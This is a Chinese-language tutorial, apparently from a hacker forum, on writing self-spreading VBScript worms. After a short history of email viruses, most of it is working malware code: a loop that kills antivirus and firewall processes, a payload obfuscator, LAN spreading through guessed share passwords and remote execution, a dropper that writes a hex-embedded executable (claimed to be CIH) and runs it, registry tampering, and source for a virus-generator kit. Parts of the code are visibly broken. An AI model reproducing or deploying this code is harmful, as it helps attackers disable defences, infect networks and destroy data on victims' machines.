网络安全 频道

教你写超级脚本病毒

1999年3月,一个名为“梅丽莎”(Melissa)的计算机病毒席卷欧、美各国的计算机网络。这种病毒利用邮件系统大量复制、传播,
造成网络阻塞,甚至瘫痪。并且,这种病毒在传播过程中,还会造成泄密。

2000年5月:“爱虫”(LoveLetter)病毒出现。“爱虫”病毒是一种脚本病毒,它通过微软的电子邮件系统进行传播。这一病毒的邮件主题为“I Love You”,包含一个附件“Love-Letter-for-you.txt.vbs”,一旦在微软电子邮件中打开这个附件,系统就会自动复制并向用户通讯簿中所有的电子邮件地址发送这一病毒,其传播速度比“梅莉沙”病毒还要快好几倍。


2001年1月21日
一种变形的“梅丽莎”病毒侵袭麦金塔(Macintosh)电脑。这种病毒能感染Mac文件,
病毒产生的大量电子邮件可以堵塞服务器,修改微软Word程序的设置,感染文件和模板。
携带这种“梅丽莎”病毒的电子邮件附件名叫“Anniv.DOC”。这是这种类型的病毒第一次将矛头指向了麦金塔电脑。


2001年2月15日
荷兰警方13日逮捕了一名自称发明了“库尔尼科娃”电脑病毒的20岁男子。此人要面临坐牢4年的处罚。
通过电子邮件传播的“库尔尼科娃”病毒12日在欧洲、美洲和亚洲发作,大量垃圾邮件积压在电子邮件系统内,
系统速度明显变慢,有的公司干脆关闭了电子邮件系统。这名荷兰男子自称是19岁的俄罗斯网球女星安娜·库尔尼科娃的球迷
这个病毒的作者说,他不是编程专家,不过是从互联网上下载了病毒,然后编写程序完成的。


2001年5月6日
一种新的恶性电脑病毒“欢乐时光”(Happytime/VBSHappytime.A.Worm)已在中国开始传播。
“欢乐时光”病毒很可能是一种国产病毒,它是类似“爱虫”的蠕虫类病毒。用户通过美国微软公司办公套件(Outlook)
收取带有“欢乐时光”病毒的邮件时,无论用户是否打开邮件,只要鼠标指向带毒的邮件,“欢乐时光”病毒即被激活,
随后立即传染硬盘中的文件。感染“欢乐时光”病毒后,如果电脑时钟的日期和月份之和为13,
则该病毒将逐步删除硬盘中的EXE和Dll文件,最后导致系统瘫痪。


▲2001年5月11日


新病毒“主页”正在全球传播,这种被称作“HomePage”的病毒被看作是“库尔尼科娃”病毒的“远亲”。携带这种电脑病毒的邮件题目为“主页”,邮件正文写道:“嗨,你应该看看这个网页,它确实很酷。”邮件中夹带着一个名为“HOMEPAGE.HTML.VBS”的附件。用户一旦打开附件,病毒第一步先自我复制,并向微软Outlook地址簿中的每一个地址发去一封携毒邮件。然后搜索Outlook收件箱,将其中名为“主页”的信件统统删除,同时打开数个色情网页。值得庆幸的是,上述病毒没有造成太大的破坏,不到1万台电脑受此影响陷入了瘫痪。由于时差的关系,美国地区的防病毒公司在接到来自东半球的消息后,对病毒加以防范,成功抵制了病毒进一步扩散。



                                         ---------摘自《一个真实的病毒世界》
                                                           中国毒客公社 http://www.retcvc.com

脚本病毒的制造非常的容易,对于一个对编程一窍不通的人来说,只要对windows系统和注册表有足够的了解,
在到网络上下载几个病毒代码仔细看看,就能在短时间内写出一个病毒的变种体来,脚本病毒的特征性就是
那么几个,没有多少编程技巧而言,所以真正的病毒制造者是不用vbscript写病毒的,现在由于脚本语言的流行,
以及Micrsoft推出的WSH(Windows Script Hosting),更让这些脚本语言可以在一台计算机上兴风作浪。
WSH是一个能让Visual Basic Script和JScript脚本在Windows环境下,如命令行里的批处理文件一样运行的一个服务。
它可以让Script去创建一个Windows里的COM/OLE对象,并去使用这些对象里的方法,属性和事件。脚本病毒的制造非常的容易,
对于一个对编程一窍不通的人来说,只要对windows系统和注册表有足够的了解,在到网络上下载几个病毒代码仔细看看,
就能在短时间内写出一个病毒的变种体来.因此脚本病毒容易写,也容易被清楚和防范,网上针对怎样防范它的文章可谓多如牛毛,
人亦发展,病毒也要进化哈


                                                    Begin

1,现在的很多杀毒软件都能对未知的脚本病毒做出判断,所以病毒要想生存就必须做出更好的保护:
  
(1).病毒要用到大量的VMI,使其可以杀掉杀毒软件或防火墙的进程,这里我给出一段代码:
do
strComputer = "."
Set objWMIService = GetObject(""winmgmts:"" & ""{impersonationLevel=impersonate}!\\\\"" & strComputer & ""\\root\\cimv2"")
fv = Array(""Notepad.exe"", ""pccguide.exe"", ""pccclient.exe"",""Rfw.exe"", ""DAVPFW.exe"", ""vpc32.exe"", ""ravmon.exe"", ""debu.exe"", ""scan.exe"", ""mon.exe"", ""vir.exe"", ""iom.exe"", ""ice.exe"", ""anti.exe"", ""fir.exe"", ""prot.exe"", ""secu.exe"", ""dbg.exe"", ""pcc.exe"", ""avk.exe"", ""spy.exe"", ""pcciomon.exe"", ""pccmain.exe"", ""pop3trap.exe"", ""webtrap.exe"", ""vshwin32.exe"", ""vsstat.exe"", ""navapw32.exe"", ""lucomserver.exe"", ""lamapp.exe"", ""atrack.exe"", ""nisserv.exe"", ""vavrunr.exe"", ""navwnt.exe"", ""pview95.exe"", ""luall.exe"", ""avxonsol.exe"", ""avsynmgr.exe"", ""symproxysvc.exe"", ""regedit.exe"", ""smtpsvc.exe"", ""moniker.exe"", ""program.exe"", ""explorewclass.exe"", ""rn.exe"", ""ms.exe"", ""microsoft.exe"", ""office.exe"", ""smtpsvc.exe"", ""avconsol.exe"", ""avsunmgr.exe"", ""vsstat.exe"", ""navapw32.exe"", ""navw32.exe"", ""nmain.exe"", ""luall.exe"", ""lucomserver.exe"", ""iamapp.exe"", ""atrack.exe"", ""nisserv.exe"", ""rescur32.exe"", ""nisum.exe"", "" navlu32.exe"", ""navrunr.exe"", ""pview95.exe"", ""f-stopw.exe"", ""f-prot95.exe"", ""pccwin98.exe"", ""fp-win.exe"", ""nvc95.exe"", ""norton.exe"", ""mcafee.exe"", ""antivir.exe"", ""webscanx.exe"", ""safeweb.exe"", ""cfinet.exe"", ""cfinet32.exe"", ""avp.exe"", ""lockdown2000.exe"", ""lockdown2002.exe"", ""zonealarm.exe"", ""wink.exe"", ""sirc32.exe"", ""scam32.exe"", ""regedit.exe"", ""tmoagent.exe"", ""tmntsrv.exe"", ""tmproxy.exe"", ""tmupdito.exe"", ""tsc.exe"", ""krf.exe"", ""kpfw32.exe"", ""_avpm.exe"", ""autodown.exe"", ""avkser.exe"", ""avpupd.exe"", ""blackd.exe"", ""cfind.exe"", ""cleaner.exe"", ""ecengine.exe"", ""fp-win.exe"", ""iamserv.exe"", ""lcloadnt.exe"", ""lookout.exe"", ""n32acan.exe"", ""navw32.exe"", ""normist.exe"", ""padmin.exe"", ""pccwin98.exe"", ""rav7win.exe"", ""smc.exe"", ""tca.exe"", ""vettray.exe"", ""ackwin32.exe"", ""avpnt.exe"", ""avpdos32.exeP"", ""avsched32.exe"", ""blackice.exe"", ""efinet32.exe"", ""esafe.exe"", ""ibmasn.exe"", ""icmoon.exe"", ""navapw32.exe"", ""nupgrade.exe"", ""pavcl.exe"", ""pcfwallicon.exe"", ""scanpm.exe"", ""sphinx.exe"", ""sphinx.exe"", ""tds2-98.exe"", ""vsscan40.exe"", ""webscanx.exe"", ""webscan.exe"", ""anti-trojan.exe"", ""ave32.exe"", ""avp.exe"", ""avpm.exe"", ""cfiadmin.exe"", ""dvp95.exe"", ""espwatch.exe"", ""ibmavsp.exe"", ""icsupp95.exe"",""jed.exe"", ""moolive.exe"", ""nisum.exeP"", ""nvc95.exe"", ""navsched.exe"", ""persfw.exe"", ""safeweb.exe"", ""scrscan.exe"", ""sweep95.exe"", ""tds2-nt.exe"", ""_avpcc.exe"", ""apvxdwin.exe"", ""avwupd32.exe"", ""cfiaudit.exe"", ""claw95ct.exe"", ""dv95_O.exe"", ""f-agnt94.exe"", "" findviru.exe"", ""iamapp.exe"", ""icload95.exe"", ""icssuppnt.exe"", ""mpftray.exe"", ""nmain.exe"", ""rav7.exe"", ""scan32.exe"", ""serv95.exe"", ""vshwin32.exe"", ""zonealarm.exe"", ""avpmon.exe"", ""avp32.exe"", ""kavsvc.exe"", ""mcagent.exe"", ""nvsvc32.exe"", ""mcmnhdlr.exe"", ""regsvc.exe"", ""mailmon.exe"", ""fp-win.exe"", ""mghtml.exe"")"
for Each fa in fv
Set colProcessList = objWMIService.ExecQuery (""Select * from Win32_Process Where Name = \''""&fa&""\''"")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
next
loop
Array()数组存放了200多个杀毒软件和防火墙的主进程,当然你可以在程序的一开始就定义这个数组,在下面
的感染函数部分中,用它就可以删除这些软件的主程序体。但话又说回来,这要在抢在杀毒软件之前就运行起来
,才能达到目的。

(2).病毒要尽可能的用到变形功能,使用新的加密算法,当然脚本的加密算法是很简单的,在这一点上新欢乐时光
就做的很好.
Execute DeCode("kqe`mv fcjjm ")
Function DeCode(Coded)
For i=1 To Len(Coded)
Curchar=Mid(Coded,i,1)
If Asc(Curchar) = 15 then Curchar=chr(10)
Else if Asc(Curchar) = 16 then Curchar=chr(13)
Else if Asc(Curchar) = 17 then Curchar=chr(32)
Else if Asc(Curchar) = 18 then Curchar=chr(9)
Else Curchar=chr(Asc(Curchar)-2)
end if
DeCode=Decode & Curchar
Next
End function
下面给出一个c的示例(程序有点问题,请老师指教一下^_^)

#include <string.h>
#include <stdio.h>
main()
{
    FILE *in,*out,*read;
    char *exc="Execute DeCode(\\"";
    char *excu="\\")\\n";
    char *func="Function DeCode(Coded)\\nFor i=1 To Len(Coded)\\nCurchar=Mid(Coded,i,1)\\n";
    char *funct="If Asc(Curchar) = 15 then Curchar=chr(10)\\nElse if Asc(Curchar) = 16 then Curchar=chr(13)\\n";
    char *functi="Else if Asc(Curchar) = 17 then Curchar=chr(32)\\nElse if Asc(Curchar) = 18 then Curchar=chr(9)\\nElse Curchar=chr(Asc(Curchar)-2)\\nend if\\nDeCode=Decode & Curchar\\nNext\\nEnd function\\n";
    char buf[100][101];
    char name[30];
    char ch;
    char *p;
    int i=0,j=0;
    gets(name);
    if((in=fopen(name,"r+"))==NULL)
    {
printf("Can\''t open the file %",name);
exit(0);
    }
    ch=getc(in);
    while(!feof(in))
    {
if(ch==15) ch=10;
else if(ch==16) ch=13;
else if(ch==17) ch=32;
else if(ch==18) ch=9;
else ch=ch-2;
fseek(in,-1L,1);
fputc(ch,in);
fseek(in,0L,1);
ch=getc(in);
    }
    fclose(in);
    read=fopen(name,"r+");
    do
    {
       if(i>=100)
       {
  fclose(in);
       }
       p=fgets(buf,80,in);
       i++;
    }while(p!=NULL);
    fclose(read);
    out=fopen(name,"w+");
    fputs(exc,out);
    for(;j<i-1;j++)
    {
       fputs(buf[j],out);
    }
    fputs(excu,out);
    fputs(func,out);
    fputs(funct,out);
    fputs(functi,out);
    fclose(out);
}

2, 病毒的攻击性可以扩展到有系统漏洞的主机上,蠕虫可以利用一些基本的DOS命令和第三方黑客工具来进行漏洞攻击

3,病毒利用邮件和局域网进性传播:

攻击局域网可以采用简化的network代码,并利用vmi直接在远程主机上运行病毒体,且可以破译共享密码(穷解破解的话,太费时间,
也没什么必要):
Sub netshare()
Dim o1,o2,o3,o4,rand,dot,count,name,driveconnected, pwd,strings ,k
count = "0"
dot = "."
driveconnected="0"
set yu=createobject("scrip"+"ting."+"filesyst"+"emob"+"ject")
set net=createobject("wsc"+"ript.n"+"etwork")
set qq=createobject("WSc"+"ript.S"+"hell")
on error resume next
randomize
randaddress()

do
do while driveconnected ="0"
checkadress()
sharename()
pwd = ""
pqd = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
For k = 1 to len(strings) step 1
net.mapnetworkdrive "I:", "\\\\" & "name" &"\\C" , "& pwd & mid(strings,k,1)" , "& pqd & mid(strings,k,1)"
If instr(net.Body, Wrong) <> 0 Then
pwd = pwd & mid(strings,k,1)
End If
Next
’破译共享密码
enumdrives()
loop
copy()
disconnectdrive()
qq "\\\\name\\con\\con",0
run ()
loop
end sub

function run()
Dim Controller, RemoteScript
Set Controller = WScript.CreateObject("WSHC"+"ontroller")
Set RemoteScript = Controller.CreateScript("system.vbe", "name")
WScript.ConnectObject RemoteScript, "remote_"
RemoteScript.Execute

Do While RemoteScript.Status <> 2
WScript.Sleep 100
Loop

WScript.DisconnectObject RemoteScript
remote_Error()
end function

Sub remote_Error
Dim theError
Set theError = RemoteScript.Error
WScript.Echo "Error " & theError.Number & " - Line: " & theError.Line & ", Char: " & theError.Character & vbCrLf & "Description: " & theError.Description
WScript.Quit -1
End Sub

Function disconnectdrive()
net.removenetworkdrive "I:"
driveconnected = "0"
end function

Function copy()
yu.copyfile dir2&"\\system.vbe", "I:\\windows\\"
yu.copyfile dir2&"\\system.vbe", "I:\\windows\\system32\\"
yu.copyfile dir2&"\\system.vbe", "I:\\winnt\\system32\\"
yu.copyfile dir2&"\\system.inf", "I:\\winnt\\system32\\"
yu.copyfile dir2&"\\system.inf", "I:\\windows\\system32\\"
’复制到对方的机器上。
end function

Function checkaddress()
o4 = o4 +1
if o4 = "255" then randaddress()
end function

Function sharename()
name = " octa & dot & octb & dot & octc & dot & octd "
end function

Function enumdrives()
set you=net.enumnetworkdrives
For p = 0 to you.Count -1
if name = you.item(p) then
driveconnected = 1
else
driveconnected = 0
end if
Next
end function

Function randum()
rand = int((254 * rnd) + 1)
end function

Function randaddress()
if count < 50 then
o1=Int((16) * Rnd + 199)
coun=count + 1
else
randum()
o1=rand
end if
randum()
o2=rand
randum()
o3=rand
o4="1"
end function

4,蠕虫体内可以携带其他病毒体或木马,看下面一例:
Sub kill()
Set yu=CreateObject("Scrip"+"ting.F"+"ileSys"+"temOb"+"ject")
Set aa=CreateObject("WSc"+"ript.S"+"hell")
bb = "4D5A000300000004000000FFFF0000000000000000004000000000000000000000000000000000000000000000000000000000000000000
00000800000000E1F3F003F3F3F4C3F546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240
0000000000055504500004C01040066553F0000000000000000000E010B01023200020000000C00000000000040020000001000000020000000004
0000010000000020000010000000000000004000000000000000050000000040000470000020000000000100000100000000010000010000000000
000100000000000000000000000002000000000000030000004070000000000000000000000000000000000000040000014000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000050207400000000020000001000000002000000040000000000000000000000000000600000602E6964617461
000000020000002000000002000000060000000000000000000000000000400000402E727372630000000010000000300000000800000008000000
0000000000000000000000400000402E72656C6F63000034000000004000000002000000100000000000000000000000000000400000422E727372
63000000802B000000000100000000000000003F4000550100003F40003F0000558D44243FDB643F000000005B8D4B425150500F014C24FE5B83C3
1CFA8B2B668B6BFC8D711256668973FCC13F668973025ECC568BF08B48FCF3A4833F3F0BF67402EBF05ECCFB33DBEB0733DB643F3F643F585D680C
104000C374320F21C1E3103F241566896BFCC13F66896B023F23C36A0F516AFF5151516A016A023F5300010083C420978D469DCF8D87E7FCFFFF50
3F670040000F23C0588B4E3D3F8950FC8D40D68901FAEBB653000000005B83C324533F6800400058FF742408FF53FC595053FF53FC590F23C0585BC
3561702C060000000005E81C6130300003F010F3F0200008D5C24283F240F85F50100003F83C605568A43043CFF740804403F3F46466A006A7F8B5B
108B430C83C00450563F4100400083C410817C063F4558455E0F85B601000066837B18010F85AB0100006600433F320040000F829B010000518BBE5
23FFF3FF6C1017408663F43333F3FC0B43F3FD2428BDA43FFD793599CF63F7406663F43FFD79D0F8262010000569C833F33C0B4D68BE86A04596A3C
5AFFD78B164A8BC5FFD7813E005045000F3F010000536A006A016D737061696E742E65786500558BEC83EC4456FF155C2040008BF0003C227513463
F84C074043C2275F5803E22750D463F3C207E0646803E207FFA803E00740B803E207F0646803E0075F5C745000000008D45BC50FF1558204000F645
3F3F00000074040FB745EC50566A006A00FF1564204000503F0000005E8BE55D3F7424106A00FF74241468001040006A006A00FF156C2040006A00F
F156020400033C0C2100052570F23CC508BC5B15283C207FFD78D4222503F500FB7460E8D5410123F3FF6E18D76325052564151C1E10351033F3F4E
1CF7D14151918B463F46FC8986AD3FFF663F24007C7B8BC5FFD7956A0459528B563C83C212FFD7813E6E5A697074675A5B5F595703D55203EE558D4
43DFC89185303D7528DBE4F3FFF578956CE8D56D8BD3F00003F83C2288B5A102B5A08762C5383E8083F8B5A14035A0853578B5A08035A0C035EFC89
58043F015A08814A24400000402BEB760E03FBE23F21CCEB3383C43CEB4A0128016C240833DB8958FC8D869F3FFF3F66003F8B943FFFFFFF8950020
FB6943126FFFFFF2BC2E23F21C88B58103F593F8BF13F00005A59FFD7EBF05B58F99C33C0B43FD79D5E73318BDF663F438B4EFC8B7E3FD3FE4EFB61
0F213F208BDCFF7338FF53245989431C837B282475068B41283C200000ACDE1B32FFFFFFFF3F00005820000050200000433F32FFFFFFFF3F00006C
20000000000000000000000000000000000000000000003F00003F00003F000074200000000000003F000000000000D076F7BFC1A0F8BF2AB0F83F7
6F7BF000000001192DE7F00000000004765744D6F64756C6548616E646C65410000240147657453746172747570496E666F410000476574436F6D6D
616E644C696E65410071004578697450726F63657373004B45524E454C33322E646C6C00004E005368656C6C4578656375746541005348454C4C333
22E646C6C0089460161C3B007E670E471342675D366BDF80C8D76C5BF4C38008066BAFE0C3FD666BF58004A66C74608240FFFD68D5EF4B855550E00
B9AA2A0E00FFD3C6006051E2FE32E4880091E2FEB855550F0059B5AAFFD3C60020E2FEB4E00066C746080C10FF3FDBB7805383EC2C68001000C0B70
85351515168010500404151518BF481EC0000003F0400100066837E06177405FE464DEBEE015E10C6464D80EBE53F3F00803F3FC39787D5EF9787D5
3F449787D5EF9787D5EE003A6627530001006800400041004000320040004349482076312E3420544154554E4700000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000001097660A040000000000030003000000
280000800E000000400000801000000058000080000000001097660A04000000000001000100000070000080000000001097660A040000000000010
001000000000080000000001097660A040000000000010001000000000080000000001097660A040000000000010004040000000000000000001097
660A040000000000010004040000000000000000001097660A0400000000000100040400000000003F00003F00003F0000000000003F00001400000
03F0000000000003F0000200300003F0000000000002800000020000000400000000100040000000000000200000000000000000000000000000000
000000000000000080000080000000808000800000008000800080800000C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0
000FFFFFF00000000000000000000000000000000000000000000003333333333300000000000000000037B7B7B7B7B7B733300000000000008B7B7
B7B44444B7B73F0000000000FB7B7B7B4CCCCC447B7B73300000000FB7B7B7B7CCCCCCCC47B7B730000000FB7B7B7B7BCCCCCCCC4B7B7B3300000FB
7B71117B7BCCCCCC4B7B7B700000B7B7199911B7B7CCC7B7B7B7B730000B7B719999991B7B7B7B7B7B7B700007B7B99993F7B7B7B7B7B7B7B730000
B7B7999991B7B7B70007B7B7000F7B7B7999917B7B7B3000007B7B73000FB7B7B79997B7B7B30000073F000F7B7B7B7B7B7B7B73000C00077730000
F3F2227B7B7B7B300003F7300000F722A2A227B7B7B7730000C088000000FB2A2A2A227B7B7B77333700000000F7B2A2A2A2B7B7B7B7B7B730F0000
000FB7A2A2A2B7B7B7B7B7B7300000000F7B7A2A7B7B7B7B7B7B7300000F000000F7B7B7B7B75555B7B730000000000000FB7B7B7B55DDD55B7B3000
0000000000F7B7B7B5DDDDDD57000000000F00007F7B7BDDDDDDD57B730000000000000FB7B7BDDDDDD53F000000000000000F7B7BDDDDDD7B7B3000
00000000000000F7B7B7B7B7B70000000000000000000FFF7B7B7B77300000000000000000000007FFFFFF7000000000000000000000000000000000
000000000000000000000000000000000000000000000000FCF001FF00003F00000F00000700000300000300000100000100000180000001800000018
0000001000006010000030300001103000018070000000F0000001F0000001F000000000001C7800003E1800003F0800007F0800007F8C0000FFCC000
0FFCE0001FFDF0003FFF007FFF3FFFFFFFFFFFFF00000100010020201000010004003F00000100200334000000560053005F005600450052005300490
04F004E005F0049004E0046004F00000000003FEFFE00000100000004003F0000000004003F00003F0000000000000001000100010000000000000000
0000000000000080020000010053007400720069006E006700460069006C00650049006E0066006F0000005C020000010030003400300034003000340
04200300000004C001600010043006F006D00700061006E0079004E0061006D006500000000004D006900630072006F0073006F006600740020004300
6F00720070006F0072006100740069006F006E00000040000C000100460069006C0065004400650073006300720069007000740069006F006E0000000
000570069006E0064006F00770073002000BF8A7282E4760000340009000100460069006C006500560065007200730069006F006E000000000034002E
00300030002E00390035003000000000002F000700010049006E007400650072006E0061006C004E0061006D006500000050006200720075007300680
0000000007000260001004C006500670061006C0043006F007000790072006900670068007400000043006F00700079007200690067006800740020006
30020004D006900630072006F0073006F0066007400200043006F00720070002E00200031003900390031002D00310039003900350000003F000B0001
004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000005000420052005500530048002E00450058004500000000006C
0025000100500072006F0064007500630074004E0061006D006500000000004D006900630072006F0073006F006600740052002000570069006E0064
006F0077007300520020004F007000650072006100740069006E0067002000530079007300740065006D0000000000380009000100500072006F0064
00750063007400560065007200730069006F006E00000034002E00300030002E0039003500300000000000440000000100560061007200460069006C
00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E000000000004043F50414444494E47585850
414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E
47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E475041
4444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E4758585041444449
4E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850
4144001000001400000015305B3076303F3F3F0000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000"
vv = they(bb)
Set tt = yu.createtextfile(yu.getspecialfolder(0) & "\\rav.exe",true)
tt.write vv
tt.close
aa.run yu.getspecialfolder(0) & "\\rav.exe", 1, false
they(our)
end sub

Function they(our)
For mine = 1 To Len(our) Step 2
they = they & Chr("&h" & Mid(our, mine, 2))
Next
End Function
上面bb=" "中间一堆的十六进制代码就是CIH病毒体,也可以携带其他的病毒体或木马程序,你可以先用c写一段代码,把*.exe转化成16进制的形式,
写入不病毒体内,然后用function they(our)函数将气还原并运行之^_^ 下面给出一个c的示例:

#include <string.h>
#include <stdio.h>
main()
{
    FILE *fp;
    char letter[250];
    int i,lenth;
    gets(letter);
    if((fp=fopen("c:\\\\letter.txt","w+"))==NULL)
    {
printf("Can\''t open the file.\\n");
exit(1);
    }
    for(i=0;i<strlen(letter);i++)
fprintf(fp,"%x00",letter,fp);
    fclose(fp);
}

5,有些windows的高级用户为了防范脚本病毒,把注册表中的filesystemobject项给删掉了,新的蠕虫将在执行的开始,
检查系统的filesystemobject项是否存在,如果不存在的话,将重新写入filesystemobject项,当然你也可以将其换个名称,这样有些
杀毒软件就不一定认识了,
On Error Resume Next
Set wa=CreateObject("WSc"+"ript.S"+"hell")
tt=wa.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools")
if tt=1 then
wa.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", 00000000, "REG_DWORD"
end if
uu=wa.RegRead("HKEY_CLASSES_ROOT\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}")
if uu="" then
uu.RegWrite "HKEY_CLASSES_ROOT\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}" , "FileSystemObject", "REG_SZ"
end if
或者
a.regdelete "HKEY_CLASSES_ROOT\\Scripting.FileSystemObject\\CLSID\\"
a.regdelete "HKEY_CLASSES_ROOT\\Scripting.FileSystemObject\\"
a.regwrite "HKEY_CLASSES_ROOT\\wangzhitong\\", "FileSystem Object", "REG_SZ"
a.regwrite "HKEY_CLASSES_ROOT\\wangzhitong\\CLSID\\", "{0D43FE01-F093-11CF-8940-00A0C9054228}", "REG_SZ"
set yu=createobject("wangzhitong")
以后系统内的filesystemobject项就被替换成了wangzhitong.

6,自己写好的蠕虫怎能让其他的蠕虫一起存在一个系统中呢,所以要劲可能的消灭其他的病毒程序:)
  当然你要先分析那些病毒程序,只要清除掉他们就行了。
附:   脚本病毒制造机
利用病毒制造机可以很轻松的制造出病毒来,比如库儿尼科娃的作者就是利用vbswg做出来的,小弟也用过很多种的脚本病毒制造机,
但用他们制造出的病毒,都是很低级的,还有人把用脚本该写注册表的程序就称之为病毒,而且写出个破烂程序来就大肆宣扬,晕3,
不知国内的大哥们究竟是怎么想的,记得vbswg2.0是用vb写的,而且是很早的时候了,高手是不愿写这些东西的,自己高考后也写过
一个脚本病毒制造机,一开始觉的很有成就感,可漫漫深入理解编程的实质时,就觉的那是个非常无聊的程序,下面给出这个程序的原代码,
高手不必看了,没做优化,菜鸟可以鉴戒一下:



#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>
#define exit_success 0
#define again 1
#define m 4

int make();
int care();
void password(void);
void out(void);

main()
{
    char choose;
    clrscr();
    printf("*******************************************************************************\\n");
    printf("This is a VBS virus made machine,it\''s only used to study,don\''t used to destory.\\n");
    printf("                             Programmed by W.Z.T\\n");
    printf("                                 Version 0.1\\n");
    printf("*******************************************************************************\\n");
    puts("\\n\\t1--Strat Make\\t\\t2--View Help\\t\\t3--Exit");
    while(again)
    {
printf("choice:");
scanf("%c",&choose);
tch(choose)
{
      case\''1\'':
      {
    make();
    clrscr();
    return 0;
      }
      case\''2\'':
      {
    clrscr();
    puts("I like Virus,so i write a machine which anybody can make a Virus much easiler.\\n");
    puts("This Version is my first one,i will try to write a better one later.\\n");
    out();
      }
      case\''3\'':
      {
    exit(exit_success);
      }
      default:
      {
    puts("choice 1,2 or 3");
      }
}
    }
}

void out(void)
{
    printf("\\npause");
    getch();
    main();
}

void password(void)
{
    int i,j,y=0;
    char pwd[11+1],pass[]="wangzhitong";
    fflush(stdin);
    printf("If you want to use this function,please input the password.\\n");
    for(j=0;;)
    {
       if((pwd[j]=getch())==13)
       {
   pwd[j]=\''\\0\'';
   break;
       }
       else if(pwd[j]==8)
       {
   if(y!=0)
   {
      printf("\\b");
      y--;
      j--;
   }
   putchar(0);
   printf("\\b");
       }
       else if(j==11)
    continue;
       else
       {
    printf("*");
    y++;
    j++;
       }
   }
   if(strcmp(pwd,pass)==0)
   {
       printf("\\ndone.\\n");
   }
   else
   {
       printf("password error.\\n");
   }
}

int make()
{
    FILE *fp,*fp1;
    int i,j,aa,bb,cc,dd,ee,ff,gg,hh,jjj,kkk,lll,y=0,word=0,number=0;
    char ch,w[5],*vc=w;
    char subject[200],*sub=subject;
    char body[400],*bo=body;
    char string[100],*pop=string;
    char road[100],name2[40],road2[100],time[20],web[100];
    char pwd[11+1],pass[]="wangzhitong";
    char *ext1[27]={"txt","vbs","vbe","html","htm","bak","dll","pfg","ppl","c","bin","sig","vdb","dat","doc","xls","tsk","tmp","vdb","vlg","dsc","ptn","set","log","cfg","idx","rec"};
    char **pl=ext1;
    char str1[25][100]={"(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\""};
    char str2[]="\\") or";
    char *str[27],**pa=str;
    char *a="\\non error resume next\\nset fso=createobject(\\"scripting.filesystemobject\\")\\nset a=createobject(\\"wscript.shell\\")\\nset dir1=fso.getspecialfolder(0)\\nset dir2=fso.getspecialfolder(1)\\nset k=fso.getfile(wscript.scriptfullname)\\n";
    char *b="k.copy(dir2&\\"\\\\system.vbe\\")\\n";
    char *c="k.copy(dir1&\\"\\\\windows.vbe\\")\\n";
    char *d="set ag=fso.createtextfile(dir1&\\"\\kill.vbe\\")\\nag.writeline \\"on error resume next\\"\\nag.writeline \\"do\\"\\nag.writeline \\"strComputer=\\"\\".\\"\\"\\"\\n";
    char *e="ag.writeline \\"set objWMIService=GetObject(\\"\\"winmgmts:\\"\\" & \\"\\"{impersonationLevel=impersonate}!\\\\\\\\\\"\\" & strComputer & \\"\\"\\\\root\\\\cimv2\\"\\")\\"\\n";
    char *f="ag.writeline \\"fv=Array(\\"\\"notepad.exe\\"\\",\\"\\"pccguide.exe\\"\\",\\"\\"pccclient.exe\\"\\",\\"\\"rfw.exe\\"\\",\\"\\"davpfw.exe\\"\\",\\"\\"vpc32.exe\\"\\",\\"\\"ravmon.exe\\"\\")\\"\\n";
    char *g="ag.writeline \\"for Each fa in fv\\"\\nag.writeline \\"Set colProcessList=objWMIService.ExecQuery (\\"\\"Select * from Win32_Process Where Name=\\\''\\"\\"&fa&\\"\\"\\\''\\"\\")\\"\\nag.writeline \\"For Each objProcess in colProcessList\\"\\n";
    char *h="ag.writeline \\"objProcess.Terminate()\\"\\nag.writeline \\"Next\\"\\nag.writeline \\"next\\"\\nag.writeline \\"loop\\"\\nag.close\\na.run fso.getspecialfolder(0) & \\"\\\\kill.vbe\\"\\nset ai=fso.getfile(dir1&\\"\\\\kill.vbe\\")\\n";
    char *ii="ai.attributes=ai.attributes+2\\n";
    char *jj="set cc=fso.createtextfile(dir1&\\"\\\\Run.bat\\")\\ncc.writeline \\"@echo off\\"\\ncc.writeline \\"cls\\"\\ncc.writeline \\"echo              %date% %time%\\"\\ncc.writeline \\"echo    Chinese hacker is the best!\\"\\n";
